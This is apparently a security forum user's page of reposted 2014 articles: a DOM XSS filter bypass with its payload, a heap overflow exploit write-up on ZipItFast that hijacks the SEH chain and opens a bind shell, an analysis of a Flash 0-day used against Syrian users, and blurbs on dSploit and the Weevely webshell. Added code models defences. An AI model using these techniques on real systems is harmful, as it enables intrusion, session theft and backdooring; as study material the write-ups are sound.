Everything posted by Nytro
-
[h=1]An Experiment In Performing Remote Calls on x64[/h] Posted on May 4, 2014 by admin
Recently I was trying to do something more than just executing code in the context of a remote process: I wanted to call a function remotely, including supplying arguments, and have the program continue execution afterwards. What I will present in this post is what I have quickly come up with to achieve the task. There certainly are edge cases (discussed at the end) where the code will run into issues, but the general logic of it is:
1. Suspend all threads in the target process. This is achieved in the code with a call to the NtSuspendProcess native API.
2. Allocate space in the process that will contain the x64 assembly code which will set up the parameters and stack to perform the call.
3. Save all registers that will be used in performing the call. The example code does not save flags, but a full implementation will want to do that as well.
4. Write in the parameters following the Windows x64 ABI (first four parameters in RCX, RDX, R8, and R9 respectively, with the rest on the stack). The caller will have to know and supply the stack offset to the other parameters.
5. Set up the trampoline to perform the call.
6. Resume the process via NtResumeProcess and let the call happen.
7. Save the result of the call and continue execution.
Article: An Experiment In Performing Remote Calls on x64 | RCE Endeavors
-
A Small Anthology of Wretched Patriotism, by Andrei Pleșu
I have published the texts below on other occasions as well. I feel the need to remind readers of them at a moment when the trumpets of a rudimentary, fiddler-style, peevish patriotism have reignited spirits. Patriotism has become an indigestible mixture of tearful words and cave-dweller frowns. For its champions, the homeland must not be "helped" except with flattery and flexing of biceps. The idea that you can love it desperately, saddened by the evils that disfigure it (and which, more than once, come from ourselves) is too subtle for the parade barkers, convinced that fawning servilely in the lap of the little fatherland is the optimal way to serve it, when, in fact, it is a rather dishonourable kind of spoiling. In general, the professionals of patriotard rhetoric are, rather, people without identity, incapable of truly constructive deeds and, precisely for that reason, eager to save themselves by identifying with more boastful ancestors. Gigi taken by himself is nothing. But Gigi as a "descendant" of Ștefan cel Mare, or as a cousin of Brâncuși, begins to believe that he exists… Read more: adev.ro/n53au0
-
[h=1]Reverse DOM XSS[/h] by Pedro Laguna on May 4, 2014
I recently came up with an idea about how to exploit a DOM XSS vulnerability that might be worth sharing here so others can use this trick, adapt it and defeat some poor filters with a little JavaScript and some creativity. During an engagement I found a piece of code similar to this one:
<a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=[INJECTION]&category=CARS');">
The code behind goToWebsite was something like this:
function goToWebsite(e, param, base) { window.location = base + param + "=" + actionURL.value; }
It's a very clear example of DOM XSS where we can control the flow of the page using the window.location element. But why wasn't it a reflected XSS? Well, they have some filters in place. Double quotes ( " ), brackets ( < and > ) and even the semicolon ( ; ) were filtered, so we couldn't escape from the injection point, having to dig deeper into the goToWebsite function to find our way into executing arbitrary JavaScript. Lucky for us, we were still allowed to use some characters that were necessary for this trick, like parentheses ( ( and ) ), quotes ( ' ) and dots ( . ).
For a DOM XSS attack we need to modify the address where window.location is going to navigate and make it go to the javascript: URL handler. But in this case we couldn't write it directly, as the injection is happening in the middle of a string which contains a reference to a relative URL: "/ShowInfo.php?id="
How do we overcome this problem? Well, we cannot escape from the function call, but as we can insert quotes and parentheses we can modify the string that is received by the goToWebsite function like this:
<a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id='.split('').reverse().join('').concat('&category=CARS');">
These functions (split, reverse and join) will reverse the string '/ShowInfo.php?id=' to be '=di?php.ofnIwohS/'. And we are using concat to make the code valid; as it's at the end of the result string we don't care about modifying it. So now we need to insert our payload, the classic alert(1):
<a href="#" onclick="goToWebsite(this, 'url', '/ShowInfo.php?id=//)1(trela:tpircsavaj'.split('').reverse().join('').concat('&category=CARS');">
Now, if we execute that code, the resulting string will be:
javascript:alert(1)//=di?php.ofnIwohS/&category=CARS
Perfe... wait! What's this? The code is not being executed! We have managed to insert our JavaScript payload at the beginning of the string passed to window.location, but the code is not being executed. A closer look at the generated code on the page revealed the mystery:
%2f%2f)1(trela%3Atpircsavaj'.split('').reverse().join('').concat('
Key characters such as the slash ( / ) and the colon ( : ) were encoded, so our code wasn't able to execute. Time to think about how to bypass the encoding of these characters. JavaScript has the ability to replace a character inside a string like replace('old', 'new'), so I thought I could use String.fromCharCode to bypass the character limitations and make my code execute, replacing '/' and ':' by two other characters that are not URL-encoded, like '~' and '+'. But there was a problem: the comma character was also URL-encoded, so I couldn't use the replace function. Time for the second trick! Apparently, in JavaScript, you can split a string by a character and then use another character to join the strings together, like this:
'abc-def'.split('-').join('!')
After being executed this will render abc!def. The best part? We are not using any forbidden characters! Just again our old friends quotes and parentheses.
If we put everything together we have something like this in order to exploit this DOM XSS bug:
~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('
That way I was able to execute JavaScript code in this particular scenario without using any forbidden character. I am pretty sure you will not find yourself in this exact situation in the future, but hopefully you can use these two little tricks someday!
Source: Reverse DOM XSS | Pentura Labs's Blog
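The two string tricks in the post can be checked offline, and the same reconstruction shows what a fix for this handler has to validate: not the raw characters, but the URL the page is finally about to navigate to. The following is an added example written for this page, not code from Pedro Laguna's post or the assessed application. goToWebsite's concatenation, the '/ShowInfo.php?id=' base string and the final payload are taken from the post; the hardened handler, the helper names, the id value 42 and the page origin https://shop.example are assumptions made here.

```javascript
// Added example. Only goToWebsite's concatenation, the base string and the
// payload come from the post; everything else here is invented for the demo.

// What the original handler computes: window.location = base + param + "=" + value
function originalTarget(base, param, value) {
  return base + param + "=" + value;
}

// The expression the injected onclick turns the 'base' argument into.
// '~' and '+' survive the server's URL encoding and are swapped back into
// '/' (47) and ':' (58) with split/join, which needs no comma.
function injectedBase(injected) {
  return ('/ShowInfo.php?id=' + injected)
    .split('').reverse().join('')
    .split('~').join(String.fromCharCode(47))
    .split('+').join(String.fromCharCode(58))
    .concat('&category=CARS');
}

// Fix: resolve the candidate against the page origin and only allow
// same-origin http(s) paths. javascript: URLs and protocol-relative
// redirects ('//evil.example/...') both come back as null.
function safeNavigationTarget(candidate, pageOrigin) {
  let url;
  try {
    url = new URL(candidate, pageOrigin);   // WHATWG URL parser (Node and browsers)
  } catch (e) {
    return null;                            // unparseable input is refused as well
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (url.origin !== pageOrigin) return null;
  return url.pathname + url.search;
}

// Hardened handler (assumed design): build the query with URLSearchParams
// instead of string concatenation and refuse any target the check rejects.
// 'navigate' is passed in so the function can run without a DOM.
function goToWebsiteHardened(param, base, value, pageOrigin, navigate) {
  const url = new URL(base, pageOrigin);
  url.searchParams.set(param, value);
  const target = safeNavigationTarget(url.href, pageOrigin);
  if (target === null) return false;
  navigate(target);
  return true;
}

// Walk the post's scenario with a constructed page origin and id 42.
function demo() {
  const origin = 'https://shop.example';     // constructed page origin
  const payload = "~~)1(trela+tpircsavaj";    // the post's final injection
  const attack = originalTarget(injectedBase(payload), 'url', '42');
  const benign = originalTarget('/ShowInfo.php?id=42&category=CARS', 'url', '42');
  const visited = [];
  const accepted = goToWebsiteHardened(
    'url', '/ShowInfo.php?id=42&category=CARS', '42', origin, t => visited.push(t));
  return {
    attack,                                              // begins with "javascript:"
    attackRefused: safeNavigationTarget(attack, origin) === null,
    benignAllowed: safeNavigationTarget(benign, origin),
    schemeRelativeRefused: safeNavigationTarget('//evil.example/x', origin) === null,
    hardenedAccepted: accepted,
    hardenedVisited: visited[0],
  };
}
```

The check deliberately looks at the parsed scheme and origin rather than at individual characters, which is exactly what the encoding filter in the post got wrong: it blocked '/' and ':' but let split/join rebuild them. In a real page the stronger fix is to stop placing user input inside an inline handler at all; the validator is the last line of defence for the navigation itself.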
-
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks
Vyacheslav Zakorzhevsky, Kaspersky Lab Expert
In mid-April we detected two new SWF exploits. After some detailed analysis it was clear they didn't use any of the vulnerabilities that we already knew about. We sent the exploits off to Adobe and a few days later got confirmation that they did indeed use a 0-day vulnerability that was later labeled as CVE-2014-0515. The vulnerability is located in the Pixel Bender component, designed for video and image processing.
We received a sample of the first exploit on April 14, while a sample of the second came on April 16. The first exploit was initially recorded by KSN on April 9, when it was detected by a generic heuristic signature. There were numerous subsequent detections on April 14 and 16. In other words, we succeeded in detecting a previously unknown threat using heuristics.
According to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn't detected using the same heuristic signature as the first, because it contained a unique shellcode.
Each exploit comes as an unpacked flash video file. The ActionScript code inside was neither obfuscated nor encrypted. As is usually the case with this kind of exploit, the first stage is a heap spray - preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version. If Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used.
[Figure: A fragment of the vulnerable Pixel Bender code (the data in the red box is changed according to system version)]
[Figure: Fragment of the decompiled exploit code]
Next comes the actual exploitation of the vulnerability, namely modification of one of the indices in the table of methods/virtual functions.
Interestingly, both exploits have two shellcodes. The first is similar in both applications; it is quite short and prepares the memory for the successful functioning of the second shellcode.
[Figure: A fragment of the first shellcode debugged in WinDBG]
Firstly, the current memory is marked as read, write and execute with the API function VirtualProtect, and then additional memory is allocated using VirtualAlloc. The second shellcode is copied to this memory and control is transferred to it. The initialization of API functions and transfer of the control to the second shellcode appear in red boxes in the screenshot above.
The exploits' second shellcodes differ significantly. The exploit that we detected first has a standard shellcode (movie.swf). It performs a search of system libraries in the memory, and then downloads and runs the payload. Unfortunately, the link turned out to be inactive at the time of our research.
[Figure: Fragment of the movie.swf exploit's second shellcode responsible for the download and launch of the payload]
In the other exploit - include.swf - the second shellcode was unusual. It receives the base DLL address for flash10p.ocx, searching it for specific fragments, and interacts with the ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In version 5x0. This add-in is used by web-conference participants to view documents and images from the presenter's screen. It should be noted that the exploit will not work if the required versions of Adobe Flash Player ActiveX and Cisco MPE are not present on the system.
[Figure: Fragment of the include.swf exploit's second shellcode]
It appears that part of the information for the exploit include.swf is passed on from outside. According to KSN data, the referer to include.swf points to another SWF file: stream.swf. At the same time, the referer of the first exploit - movie.swf - points to index.php located in the same folder as the exploit (see below).
We couldn't establish the exact payload of the exploit include.swf due to a lack of data relayed from the landing page and/or other exploits. We are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer.
Both the exploits detected by us spread from a site located at ???? ??????? ???????? ??????. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online form for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government. The site was hacked in September 2013, something the alleged hacker announced on his Twitter account. The link to these exploits is as follows: http://jpic.gov.sy/css/images/_css/***********. When we entered the site, the installed malware payloads were already missing from the "_css" folder. We presume the criminals created a folder whose name doesn't look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site.
To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox. It's likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this.
Moreover, while the first exploit is pretty standard and can infect practically any unprotected computer, the second exploit (include.swf) only functions properly on computers where Adobe Flash Player 10 ActiveX and Cisco MeetingPlace Express Add-In are installed. The Flash Player Pixel Bender component, which Adobe no longer supports, was used as the attack vector. The authors were counting on the developers not finding a vulnerability in that component and that the exploit would remain active for longer. All this suggests that the attackers were not targeting users en masse.
We detect such exploits by AEP technology as PDM:Exploit.Win32.Generic and by heuristics as HEUR:Exploit.SWF.CVE-2014-0515.gen.
Source: https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks
-
Windows Heap Overflow Exploitation
Nytro posted a topic in Reverse engineering & exploit development
[h=3]Windows Heap Overflow Exploitation[/h]
Hi, in this article I will be talking about exploiting a custom heap: a big chunk of memory allocated by the usermode application using VirtualAlloc, for example. The application will then work on managing 'heap' block allocations and frees (in the allocated chunk) in a custom way, with complete ignorance of the Windows heap manager. This method gives the software much more control over its custom heap, but it can result in security flaws if the manager doesn't do its job properly; we'll see that in detail later.
To see an implementation of a custom heap manager in C/C++ please refer to my previous blog post: Reverse Engineering 0x4 Fun: Creating and using your own 'heap' manager
Heap Manager Source code: [C++] Custom Heap Manager - Pastebin.com
The vulnerability that we'll exploit together today is a 'heap' overflow vulnerability that's occurring in a custom heap built by the application. The vulnerable software is ZipItFast 3.0; we'll be exploiting it today and gaining code execution under Windows 7. ASLR, DEP and SafeSEH aren't enabled by default in the application, which makes it even more reliable for us. Even so, there are still some painful surprises waiting for us... Let's just start:
The Exploit:
I've actually got the POC from exploit-db, you can check it right here: http://www.exploit-db.com/exploits/17512/
Oh, and there's also a full exploit here: http://www.exploit-db.com/exploits/19776/
Unfortunately, you won't learn much from the full exploitation since it will work only on Windows XP SP1. Why? Simply because it's using a technique that consists of overwriting the vectored exception handler node that exists at a static address under Windows XP SP1. Briefly, all you have to do is find a pointer to your shellcode (buffer) in the stack. Then take the stack address which points to your pointer, subtract 0x8 from that address and then perform the overwrite. When an exception is raised, the vectored exception handlers will be dispatched before any handler from the SEH chain, and your shellcode will be called using a CALL DWORD PTR DS:[ESI + 0x8] (ESI = stack pointer to the pointer to your buffer - 0x8). You can google the _VECTORED_EXCEPTION_NODE and check its elements.
And why wouldn't this work under later versions of Windows? Simply because Microsoft got aware of the use of this technique, and now EncodePointer is used to encode the pointer to the handler whenever a new handler is created by the application, and then DecodePointer is called to decode the pointer before the handler is invoked.
Okay, let's start building our exploit now from scratch. The POC creates a ZIP file with the largest possible file name, let's try it:
N.B: If you want to do some tests, execute the software from the command line as follows:
Cmd :> C:\blabla\ZipItFast\ZipItFast.exe C:\blabla\exploit.zip
Then click on the Test button in the program. Let's try executing the POC now:
An access violation happens at 0x00401C76 trying to access an invalid pointer (0x41414141 in our case). Let's see the registers:
Basically the FreeList used in this software is a circular doubly linked list similar to Windows's. The circular doubly linked list head is in the .bss section at address 0x00560478, and its flink and blink pointers are pointing to the head (self pointers) when the custom heap manager is initialized by the software. I also didn't check the full implementation of the FreeList and the free/allocate operations in this software to see if they're similar to Windows's (bitmap, block coalescing, etc.). It's crucial also to know that in our case, the block is being unlinked from the FreeList because the manager had a 'request' to allocate a new block, and it was chosen as the best block for the allocation.
Let's get back to analysing the crash:
- First I would like to mention that we'll be calling the pointer to the Freelist Entry struct "entry".
Registers State at 0x00401C76:
EAX = entry->Flink
EDX = entry->Blink
[EAX] = entry->Flink->Flink
[EAX+4] = entry->Flink->Blink (Next Block's Previous block)
[EDX] = entry->Blink->Flink
[EDX+4] = entry->Blink->Blink (Previous Block's Next block)
Logically speaking: the Next Block's Previous Block and the Previous Block's Next Block are nothing but the current block. So the 2 instructions that do the block unlinking from the FreeList just:
- Set the previous freelist entry's flink to the block entry's flink.
- Set the next freelist entry's blink to the block entry's blink.
By doing so, the block doesn't belong to the freelist anymore and the function simply returns after that. So it'll be easy to guess what's happening here: the software allocates a static 'heap' block to store the name of the file, and it would have been best to allocate the block based on the filename length from the ZIP header (this could be a fix for the bug, but heap overflows might be found elsewhere; I'll propose a better method to fix, but not fully, this bug later in this article).
Now, we know that we're writing past our heap block and thus overwriting the custom metadata of the next heap block (flink and blink pointers). So, we'll need to find a reliable way to exploit this bug, as the 2 unlinking instructions are the only ones available to us and we control both EAX and EDX (if it's not possible in another case you can see if there are other close instructions that might help). You can think of overwriting the return address or the pointer to the structured exception handler, as we have a stack that won't be rebased after reboot. This might be a working solution in another case where your buffer is stored in a static memory location.
But under Windows 7, it's not the case: VirtualAlloc allocates a chunk of memory with a different base in each program run. In addition, even if the address was static, the location of the freed block that we overwrite varies. So in both cases we'll need to find a pointer to our buffer. The best place to look is the stack; remember that the software is trying to unlink (allocate) the block that follows the block where we've written the name, so likely all near pointers in the stack (current and previous stack frame) are pointing to the newly allocated block (pointer to metadata). That's what we don't want, because the flink and blink pointers that we might set might not be valid opcodes and might cause exceptions, so all we need to do is try to find a pointer to the first character of the name and then figure out how to use this pointer to gain code execution; this pointer might be in previous stack frames.
And here is a pointer pointing to the beginning of our buffer: 3 stack frames away
Remember that 0x01FB2464 will certainly be something else when restarting the program, but the pointer 0x0018F554 is always static, even when restarting the machine.
So when I was at this stage, I started thinking and thinking about a way that will help me redirect execution to my shellcode, which is for sure at the address pointed to by 0x0018F554, and by using only what's available to me:
- Controlled registers: EAX and EDX.
- Stack pointer to a dynamic buffer pointer.
- 2 unlinking instructions.
- No stack rebase.
Exploiting the vulnerability and gaining code execution:
And then I thought, why wouldn't I corrupt the SEH chain and create a fake frame? Because when trying to corrupt an SEH chain there are 3 things that you must know:
- SafeSEH and SEHOP are absent.
- Have a pointer to an existing SEH frame.
- Have a pointer to a pointer to the shellcode.
The pointer to the shellcode will be treated as the handler, and the value pointed to by ((ptr to ptr to shellcode)-0x4) will be treated as the pointer to the next SEH frame. Let's illustrate the act of corrupting the chain (with a silly illustration, sorry):
Let me explain: we need to achieve our goal by using these 2 instructions, right?
MOV [EDX],EAX
MOV [EAX+4],EDX
We'll need 2 pointers and we control 2 registers, but which pointer to give to which register? This must not be a random choice, because you might overwrite the pointer to the shellcode if you chose EAX as a pointer to your fake SEH frame. So we'll need to do the reverse, but with the precaution of not overwriting anything critical. In addition, we actually don't care about the value of "next SEH frame" of our fake frame. So our main goal is to overwrite the "next SEH frame" pointer of an existing frame; to do so we need to have a pointer to our fake frame in one of the 2 registers. As [EAX+4] will overwrite the pointer to the buffer if used as a pointer to the fake SEH frame, we will use EDX instead. We must also not overwrite the original handler pointer, because it will be executed first to try to handle the exception; if it fails, then our fake handler (shellcode) will be invoked.
So:
EDX = &(pointer to shellcode) - 0x4 = Pointer to Fake "Next SEH frame" element.
EDX must reside in the next frame field of the original frame, which is [EAX+4]. And EAX = SEH Frame - 0x4.
Original Frame after overwrite:
Pointer to next SEH: Fake Frame
Exception Handler: Valid Handler
Fake Frame:
Pointer to next SEH: (Original Frame) - 0x4 (we just don't care about this one)
Exception Handler: Pointer to shellcode
The SEH frame I chose is at 0x0018F4B4. So: EAX = 0x0018F4B4 - 0x4 = 0x0018F4B0 and EDX = 0x0018F554 - 0x4 = 0x0018F550
When the overwrite is done the function will return normally to its caller, and all we have to do now is wait for an exception to occur. An exception will occur after a dozen instructions, as the metadata is badly corrupted. The original handler will be executed, but it will fail to handle the access violation and then our fake handler will be called, which is the shellcode.
Making the exploit work:
Now all we need to do is calculate the length between the 1st character of the name and the flink and blink pointers, and then insert our pointers in the POC.
Inserting the shellcode:
The space between the starting address of the buffer and the overwritten heap metadata is not so large, so it's best to put an unconditional jump at the start of our buffer to jump past the overwritten flink and blink pointers, and then put the shellcode just after the pointers. As we can calculate the length, this won't cause any problem.
Final exploit here: [Perl] ZipItFast Heap Overflow - Pastebin.com
I chose a bind shellcode, which opens a connection to (0.0.0.0:4444). Let's try opening the ZIP file using ZipItFast and then check "netstat -an | find "4444"":
Bingo!
A Fix for this vulnerability??
The method I stated before, which consists of allocating the block based on the filename length from the ZIP headers, can be valid only to fix the vulnerability in this case, but what if the attackers were also able to cause an overflow elsewhere in the software? The best way to fix the bug is this: when a block is about to be allocated and it's about to be unlinked from the Freelist, the first thing that must be done is checking the validity of the doubly linked list. To do so, safe unlinking must be performed, which was introduced in later versions of Windows. Safe unlinking is done the following way:
if ( entry->flink->blink != entry->blink->flink || entry->blink->flink != entry ) {
    // Fail, Freelist corrupted, exit process
} else {
    // Unlink then return the block to the caller
}
Let's see how safe unlinking is implemented under Windows 7. The function that we'll look at is RtlAllocateHeap exported by ntdll.
Even if this method looks secure, there is some research published online that describes weaknesses of this technique and how it can be bypassed. I also made sure to implement this technique in my custom heap manager (Line 86), link above.
I hope that you've enjoyed reading this paper. See you again soon, Souhail Hammou.
Source: Reverse Engineering 0x4 Fun: Windows Heap Overflow Exploitation
-
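The metadata overwrite described in the heap overflow post above, and the safe-unlinking check it recommends as the fix, can be modelled without the real binary. The following is an added example written for this page, not Souhail Hammou's code, his custom heap manager or ZipItFast: a 32-bit process's custom free list is modelled as a flat byte buffer, the block addresses 0x100/0x200/0x300/0x400 and the fake flink/blink values 0x500/0x600 are constructed for the demo (in the post the real values were the stack addresses 0x0018F4B0 and 0x0018F550), and the two MOV instructions from the post become two 4-byte stores.

```javascript
// Added example. Memory model of a 32-bit process: a flat buffer in which
// each free-list entry is 8 bytes of metadata, [Flink:u32][Blink:u32],
// stored little-endian, followed by the block's data. Every address below
// is an offset into this buffer and is constructed for the demo.
const MEM_SIZE = 0x1000;
const HDR = 8;                       // size of the flink/blink header
const HEAD = 0x100;                  // list head (stands in for 0x00560478)
const NAME_BLOCK = 0x200;            // allocated block holding the file name
const NEXT_BLOCK = 0x300;            // free block whose metadata gets overwritten
const LAST_BLOCK = 0x400;            // another free block
const FAKE_FLINK = 0x500, FAKE_BLINK = 0x600;   // attacker-chosen values (constructed)

const makeMemory = () => new DataView(new ArrayBuffer(MEM_SIZE));
const rd = (m, a) => m.getUint32(a, true);
const wr = (m, a, v) => m.setUint32(a, v, true);

// Link the given free blocks into a circular doubly linked list behind HEAD.
function buildFreeList(mem, blocks) {
  let prev = HEAD;
  for (const b of blocks) {
    wr(mem, prev, b);           // prev->Flink = b
    wr(mem, b + 4, prev);       // b->Blink = prev
    prev = b;
  }
  wr(mem, prev, HEAD);          // last->Flink = HEAD
  wr(mem, HEAD + 4, prev);      // HEAD->Blink = last
}

// The unlink exactly as the post describes it at 0x00401C76:
//   EAX = entry->Flink ; EDX = entry->Blink
//   MOV [EDX],EAX      ; entry->Blink->Flink = entry->Flink
//   MOV [EAX+4],EDX    ; entry->Flink->Blink = entry->Blink
// With corrupted metadata these become two attacker-controlled 4-byte writes.
function unsafeUnlink(mem, entry) {
  const eax = rd(mem, entry);
  const edx = rd(mem, entry + 4);
  wr(mem, edx, eax);
  wr(mem, eax + 4, edx);
}

// Safe unlinking: refuse the block unless both neighbours still point back
// at it (equivalent to the condition quoted in the post). Returns true when
// the block was unlinked, false when the list is corrupted.
function safeUnlink(mem, entry) {
  const flink = rd(mem, entry);
  const blink = rd(mem, entry + 4);
  if (rd(mem, flink + 4) !== entry || rd(mem, blink) !== entry) {
    return false;               // corrupted free list: abort instead of writing
  }
  unsafeUnlink(mem, entry);
  return true;
}

// The bug: the file name is copied into NAME_BLOCK with no length check, so a
// long name runs into NEXT_BLOCK's header; its last 8 bytes become Flink/Blink.
function copyNameUnchecked(mem, nameBytes) {
  for (let i = 0; i < nameBytes.length; i++) {
    mem.setUint8(NAME_BLOCK + HDR + i, nameBytes[i]);
  }
}
function oversizedName(fakeFlink, fakeBlink) {
  const pad = NEXT_BLOCK - (NAME_BLOCK + HDR);      // bytes up to the next header
  const bytes = new Uint8Array(pad + 8).fill(0x41); // 'A' filler, like the POC
  const v = new DataView(bytes.buffer);
  v.setUint32(pad, fakeFlink, true);
  v.setUint32(pad + 4, fakeBlink, true);
  return bytes;
}

// Run the allocation that unlinks NEXT_BLOCK after the overflow, with either
// unlink routine, and report where the two stores landed.
function allocateAfterOverflow(useSafeUnlink) {
  const mem = makeMemory();
  buildFreeList(mem, [NEXT_BLOCK, LAST_BLOCK]);
  copyNameUnchecked(mem, oversizedName(FAKE_FLINK, FAKE_BLINK));
  const unlinked = useSafeUnlink ? safeUnlink(mem, NEXT_BLOCK)
                                 : (unsafeUnlink(mem, NEXT_BLOCK), true);
  return {
    unlinked,
    storedAtFakeBlink: rd(mem, FAKE_BLINK),       // [EDX] = EAX
    storedAtFakeFlink4: rd(mem, FAKE_FLINK + 4),  // [EAX+4] = EDX
  };
}

// Control case: no overflow, so safe unlinking accepts the block and the
// list shrinks to HEAD <-> LAST_BLOCK.
function allocateIntact() {
  const mem = makeMemory();
  buildFreeList(mem, [NEXT_BLOCK, LAST_BLOCK]);
  const unlinked = safeUnlink(mem, NEXT_BLOCK);
  return { unlinked, headFlink: rd(mem, HEAD), lastBlink: rd(mem, LAST_BLOCK + 4) };
}
```

In the unchecked variant the overflowed header turns the allocation into two writes of attacker-chosen values at attacker-chosen addresses, which is all the post needs to redirect the SEH chain. The checked variant reads the neighbours before writing anything, so the forged Flink/Blink fail the back-pointer test and no store happens; in a real allocator that branch should terminate the process, as the post says, rather than carry on with a corrupted list.
-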
[h=1]Let's Write Some X86-64[/h] This is a beautiful quote, one that I think truly captures the relationship between higher level languages and the Instruction Set Architecture (ISA)'s machine code, though this is from the angle of controlling the machine with its implementation-specific quirks, which can detract from what you're actually trying to do. This blog is meant for those who don't know x86-64 assembly, but maybe know a little C, and are curious about code generation. Or maybe if you've ever tried to hand write x86-64 assembly, and got stuck trying to understand the tooling or seemingly random segfaults from what appears to be valid instructions. Article: https://nickdesaulniers.github.io/blog/2014/04/18/lets-write-some-x86-64/
-
[h=2]Volafox Mac OS X Memory Analysis Toolkit[/h]May 4th, 2014 Mourad Ben Lakhoua
Volafox is an open source toolkit that you can use for Mac OS X and BSD forensics. The tool is Python based and allows investigating security incidents and finding information about malware and any malicious program on the system. A security analyst can get the following information using this tool:
- Mac kernel version, CPU and memory specification
- Mounted filesystems
- Kernel Extensions listing
- Process listing
- Task listing (finding process hiding)
- Syscall table (hooking detection)
- Mach trap table (hooking detection)
- Network socket listing (hash table)
- Open files listing by process
- Show boot information
- EFI System Table, EFI Runtime Services
- Print a hostname
[Screenshot of volafox]
You can download the tool from the following link: https://code.google.com/p/volafox/
Source: Volafox Mac OS X Memory Analysis Toolkit | SecTechno
-
[h=2]LiME – Linux Memory Extractor[/h]January 19th, 2014 Mourad Ben Lakhoua
Mobile platform security tools are increasing and we have more open source tools that allow conducting forensic analyses on phone devices. If you want to investigate the Android operating system you can use LiME. LiME (formerly DMD) allows investigating the file system from memory or over the network; this can be used to get a full memory capture to see if there are abnormal processes or services that have been used in a previous attack. Working on the system during the analysis is not recommended as this may modify the file system, so LiME minimizes the interaction between user and kernel space processes during acquisition, which allows it to produce memory dumps that are more forensically sound than those of other tools designed for Linux memory acquisition. To get the memory over a TCP tunnel we first need to make the device listen on a specified port, which we connect to from our host. When the host connects to the socket it will automatically start sending the RAM image to the host for analysis. On the host computer, we connect to this port with netcat and redirect the output to a file. You can download the tool from the following link: lime-forensics - LiME - Linux Memory Extractor - Google Project Hosting
Source: LiME – Linux Memory Extractor | SecTechno
-
[h=2]DSploit Android Toolkit for Security Testing[/h]April 20th, 2014 Mourad Ben Lakhoua
dSploit is a very comfortable tool that you can install on Android to run a pentest or network security assessment. The toolkit allows fingerprinting the remote operating systems and identifying different hosts, scanning the network for system vulnerabilities and performing MITM to sniff sensitive information such as users' passwords. The features included in dSploit are:
- WiFi Scanning & Common Router Key Cracking
- Deep Inspection
- Vulnerability Search
- Multi Protocol Login Cracker
- Packet Forging with Wake On Lan Support
- HTTPS/SSL Support ( SSL Stripping + HTTPS -> Redirection )
- MITM Real-time Network Stats
- MITM Multi Protocol Password Sniffing
- MITM HTTP/HTTPS Session Hijacking
- MITM HTTP/HTTPS Hijacked Session File Persistence
- MITM HTTP/HTTPS Real-time Manipulation
[Screenshot of the MITM module in dSploit]
The toolkit will help a security officer or penetration tester to demonstrate how it is possible to exploit vulnerabilities and take control of targeted systems. The team have officially announced that they have new nightly builds that you can download over this link: http://update.dsploit.net/nightly
-
[h=2]Watcher Web passive vulnerability scanner[/h]September 29th, 2013 Mourad Ben Lakhoua
Web applications are one of the most targeted systems as they are directly exposed to the internet. There is no web server without serious vulnerabilities; it is enough that you open Exploit DB, where you will find how simple it is to exploit vulnerable CMSs or web applications. Hackers are often searching for and finding those bugs where there is no correct code and that may leak some very sensitive information; in the end, developers are people and they often make some incautious mistakes. Developers are mostly looking to have more functionality to increase usability, and as you add that functionality you need to add more code, which may lead to more vulnerabilities. That's why you need to conduct penetration testing on a periodic basis to detect those bugs. During a pentest you can try Watcher.
Watcher is an open source tool that can be a good addition to your penetration testing toolkit. It will passively scan the web applications, searching for some serious vulnerabilities in the user input fields. First you start by installing Fiddler, a proxy framework to integrate Watcher with. Next you just open in the browser the website you need to verify, where you can find important information by severity (high, medium or low), an online reference for the security issue and how to fix the bug; you can also export the results to an HTML or XML report.
[Screenshot of Watcher]
Watcher is developed using C# and contains more than 30 checks to perform the vulnerability assessment against your target. This will be part of your evaluation project and it is extremely fast at finding the security issues. You can download the latest release from the following link: Watcher: Web security testing tool and passive vulnerability scanner - Home
Source: Watcher Web passive vulnerability scanner | SecTechno
-
[h=2]Weevely 1.1 – PHP Webshell[/h]June 16th, 2013 Mourad Ben Lakhoua
Weevely is a PHP webshell that provides an SSH connection to manage a website remotely. It can be used as a backdoor system for a PoC during a pentest or as a web shell to manage legitimate web accounts. The shell consists of more than 30 modules to automate both administrative and post-operational tasks, including:
- Execute commands and browse the remote filesystem, even with PHP security restrictions
- Audit common server misconfigurations
- Run an SQL console pivoting on the target machine
- Proxy your HTTP traffic through the target
- Mount the target filesystem to a local mount point
- Simple file transfer from and to the target
- Spawn reverse and direct TCP shells
- Bruteforce SQL accounts through the target system
- Run port scans from the target machine
First of all, the penetration tester needs to generate the PHP backdoor file with the connection password. Next, upload the weevely.php file generated by the tool to the webserver; weevely will automatically detect the best way to execute the commands on the targeted system. Weevely communications are hidden in HTTP cookies and are obfuscated to bypass NIDS signature detection. If you are using Backtrack you can find the tool already integrated under /pentest/web/backdoors/. It is also possible to find it on BackBox. To download and use Weevely make sure to follow this link.
Source: Weevely 1.1 – PHP Webshell | SecTechno
-
